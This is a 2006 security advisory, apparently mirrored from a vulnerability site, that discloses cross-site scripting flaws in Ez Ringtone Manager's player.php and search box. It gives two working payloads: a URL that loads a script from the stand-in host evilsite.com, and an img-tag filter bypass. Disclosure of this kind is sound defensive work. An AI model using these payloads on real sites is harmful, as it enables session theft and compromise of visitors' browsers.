Computer Security

Security Advisory: Ez Ringtone Manager from scriptez.net - XSS
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SA20515] WebFORM and FORM2MAIL Mail Header Injection Vulnerability

  [Full-disclosure] Docebo CMS 3.0.3, Remote command execution

  'Multiple Sql injection and XSS in integramod portal

  PHP-Nuke <= 7.9 Search XSS Vulnerability

From:luny_(at)_youfucktard.com <luny_(at)_youfucktard.com>
Date:09.06.2006
Subject:Ez Ringtone Manager from scriptez.net - XSS

Ez Ringtone Manager

Homepage:
http://www.scriptsez.net

Effected files:
player.php
search input box.

XSS Vulnerabilities:

http://example.com/ringtones/player.php?action=preview&id=<SCRIPT%20SR
C=http://evilsite.com/xss.js></SCRIPT>&cat=LG%20Mobiles

The search box doesnt properlly filter user input. Tags like <script> are filtered, and backslashes
are added for ' and "

We can get around this by simply using a <img> tag and ' for '. Poc:
<IMG SRC=javascript:alert('XSS')>
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru